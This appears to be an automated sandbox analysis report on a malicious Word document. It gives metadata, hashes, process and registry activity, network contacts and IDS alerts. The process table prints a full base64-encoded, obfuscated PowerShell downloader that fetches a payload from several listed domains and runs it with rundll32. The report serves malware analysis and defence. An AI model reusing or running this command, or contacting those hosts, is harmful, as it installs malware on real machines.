| File name: | 00125-29.09.2020.doc |
| Full analysis: | https://app.any.run/tasks/7cc0f348-4315-481d-9314-742c43f28e63 |
| Verdict: | Malicious activity |
| Analysis date: | September 30, 2020, 08:05:58 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Iste., Author: Mathilde Simon, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 19:26:00 2020, Last Saved Time/Date: Tue Sep 29 19:26:00 2020, Number of Pages: 1, Number of Words: 3401, Number of Characters: 19391, Security: 8 |
| MD5: | 917501B098FF694C4E9756CA9247829A |
| SHA1: | 9D423C408EF347EC7E251E6A4A0CC4BAA37F19B2 |
| SHA256: | 71BF53CAD02F5AF2B34569EA58F19555DFAF749A906152486BAD6E90FFD15FB3 |
| SSDEEP: | 1536:NgpsKaEWMQsq98U1tqnyBCVXqc+m/zqux9kbk:SnPWMQsqqUnCZamGY9kbk |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | Iste. |
|---|---|
| Subject: | - |
| Author: | Mathilde Simon |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2020:09:29 18:26:00 |
| ModifyDate: | 2020:09:29 18:26:00 |
| Pages: | 1 |
| Words: | 3401 |
| Characters: | 19391 |
| Security: | Locked for annotations |
| Company: | - |
| Lines: | 161 |
| Paragraphs: | 45 |
| CharCountWithSpaces: | 22747 |
| AppVersion: | 15 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CodePage: | Unicode UTF-16, little endian |
| LocaleIndicator: | 1033 |
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\00125-29.09.2020.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3924 | POwersheLL -ENCOD JABYAGMANwA3AG8AMQA2AD0AKAAoACcAWgB2AGMAJwArACcAcQAnACkAKwAoACcAdgA2ACcAKwAnADQAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAGwARQBcAFIAOQB4ADQATwBiADUAXABNAFEAcgBsAEsAYgAxAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAYwBUAG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBgAGMAVQByAEkAVABgAHkAYABQAGAAUgBPAHQAbwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAMgAnACsAJwAsACcAKQArACcAIAB0ACcAKwAoACcAbABzADEAJwArACcAMQAsACcAKQArACcAIAAnACsAJwB0ACcAKwAnAGwAcwAnACkAOwAkAFMAawBqAGYANABpAHIAIAA9ACAAKAAoACcATgAnACsAJwA5AF8AJwApACsAJwBqAHoAJwArACcAZgAnACkAOwAkAEgAdQAwADEAagBmAHQAPQAoACgAJwBSAHUAJwArACcAaABpACcAKQArACcAMgAnACsAJwBtAHcAJwApADsAJABJAG4AbgBoAHoAeAA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAYQAnACsAJwBsAG0AJwApACsAJwBSACcAKwAoACcAOQB4ACcAKwAnADQAbwAnACsAJwBiADUAYQBsAG0ATQBxAHIAbAAnACsAJwBrAGIAMQBhACcAKQArACcAbABtACcAKQAuACIAcgBlAFAAYABsAEEAQwBFACIAKAAoAFsAYwBoAGEAcgBdADkANwArAFsAYwBoAGEAcgBdADEAMAA4ACsAWwBjAGgAYQByAF0AMQAwADkAKQAsAFsAUwBUAFIAaQBuAEcAXQBbAGMAaABhAHIAXQA5ADIAKQApACsAJABTAGsAagBmADQAaQByACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWgBjAGoANQA1AF8AbwA9ACgAKAAnAFEAeABqACcAKwAnADQAbQAnACkAKwAnAGIAcgAnACkAOwAkAEsANQAxAGgAaQAyADkAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAGIAQwBMAEkARQBuAHQAOwAkAEEANQA2ADMAMQA1AF8APQAoACgAJwBoAHQAdAAnACsAJwBwAHMAOgAvAC8AJwArACcAbQAnACkAKwAoACcAdQByAGYAJwArACcAcgBlAGUAcwBiAG8AcgBvAC4AJwArACcAZgAnACsAJwBhAGkAcgAnACkAKwAoACcAdwBhACcAKwAnAHkAJwApACsAKAAnAGMAbwBuACcAKwAnAGMAaQAnACkAKwAoACcAZQByAGcAJwArACcAZQAuAGMAJwArACcAbwBtAC8AJwApACsAKAAnAGYAagBvACcAKwAnADYAJwApACsAJwBnACcAKwAoACcANQAuAHQAeAAnACsAJwB0ACoAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwByAHkAbgBlAHIALgAnACkAKwAoACcAbgBlAHQALgBhAHUAJwArACcALwBzAHEAJwArACcAdAAnACkAKwAnAHMAdwAnACsAJwA1AGEAJwArACgAJwAuACcAKwAnAHoAaQAnACkAKwAoACcAcAAqAGgAJwArACcAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAcwB1ACcAKQArACgAJwBuAG4AeQAnACsAJwBzAGkAZAAnACsAJwBlAGMAYQAnACkAKwAoACcAZgBlACcAKwAnAG0AaQAuACcAKQArACcAYwBvACcAKwAoACcAbQAvACcAKwAnAG4AcQAnACkAKwAoACcAaQB4AHYAagAnACsAJwBjAC4AcABkAGYAKgAnACsAJwBoAHQAdABwAHMAOgAvACcAKwAnAC8AdgAnACsAJwBpACcAKwAnAHMAJwArACcAdQBtACcAKQArACgAJwAzACcAKwAnADYAMAAuACcAKQArACcAYwAnACsAJwBvACcAKwAoACcAbQAuAHUAJwArACcAeQAnACkAKwAoACcALwBnADQAJwArACcAMABqACcAKwAnAHkAdwAnACkAKwAoACcANQAnACsAJwAuAHAAZABmACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwA6AC8AJwArACcALwAnACsAJwB5AHUAbgBnAGUAJwApACsAKAAnAG4ALgBrACcAKwAnAGUAdgBpACcAKQArACgAJwBuAG0AJwArACcAYwAnACkAKwAoACcAYwBvACcAKwAnAGwAbABvAHcAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAC8AcwAnACkAKwAoACcAOQA4ADEAcQAnACsAJwB0AG0AJwApACsAKAAnAHUAJwArACcALgBwACcAKQArACcAZABmACcAKQAuACIAcwBwAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABUADUAdwBtAHAAYQB3AD0AKAAnAEwAdgAnACsAJwBvADcAJwArACgAJwBuAHcAJwArACcAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEwAXwAxAHoAZwBtADkAIABpAG4AIAAkAEEANQA2ADMAMQA1AF8AKQB7AHQAcgB5AHsAJABLADUAMQBoAGkAMgA5AC4AIgBkAE8AYAB3AE4AbABgAG8AYABBAGQARgBJAEwAZQAiACgAJABMAF8AMQB6AGcAbQA5ACwAIAAkAEkAbgBuAGgAegB4ADYAKQA7ACQAWAB1AGEAZwBxAGwAcAA9ACgAJwBEAGYAJwArACcAYwB3ACcAKwAoACcAOAAnACsAJwAxAHkAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASQBuAG4AaAB6AHgANgApAC4AIgBMAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAAMwAyADMAOQA4ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAbABsACcAKwAnADMAMgAnACsAJwAuAGUAeABlACcAKQAgACQASQBuAG4AaAB6AHgANgAsADAAOwAkAFYAcwA4ADIAawAwADAAPQAoACgAJwBBACcAKwAnAG8AagAnACkAKwAnAHYAdAAnACsAJwBxAGIAJwApADsAYgByAGUAYQBrADsAJABLADgANABiAGsAOABxAD0AKAAnAEkAJwArACgAJwBnAGsAJwArACcAOQBfAG0AJwArACcAegAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQA0AHQAZQBmAGYAdwA9ACgAJwBCADEAJwArACcAcQAnACsAKAAnADgAZwAxACcAKwAnAHgAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | o%` |
Value: 6F256000080F0000010000000000000000000000 | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (3848) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR756F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3924 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RN77NV1JITQE1X8IG0LS.temp | — | |
MD5:— | SHA256:— | |||
| 3848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 3924 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 3924 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3b806c.TMP | binary | |
MD5:— | SHA256:— | |||
| 3848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$125-29.09.2020.doc | pgc | |
MD5:— | SHA256:— | |||
| 3848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3924 | POwersheLL.exe | 75.119.215.217:443 | murfreesboro.fairwayconcierge.com | New Dream Network, LLC | US | suspicious |
3924 | POwersheLL.exe | 185.149.112.234:443 | ryner.net.au | Skylinevision Telecom LLC | CZ | suspicious |
3924 | POwersheLL.exe | 192.254.185.2:443 | sunnysidecafemi.com | Unified Layer | US | malicious |
3924 | POwersheLL.exe | 170.249.199.66:443 | visum360.com.uy | — | US | unknown |
3924 | POwersheLL.exe | 67.205.57.212:443 | yungen.kevinmccollow.com | New Dream Network, LLC | US | unknown |
Domain | IP | Reputation |
|---|---|---|
murfreesboro.fairwayconcierge.com |
| suspicious |
ryner.net.au |
| suspicious |
sunnysidecafemi.com |
| suspicious |
visum360.com.uy |
| unknown |
yungen.kevinmccollow.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
3924 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
3924 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
3924 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
3924 | POwersheLL.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |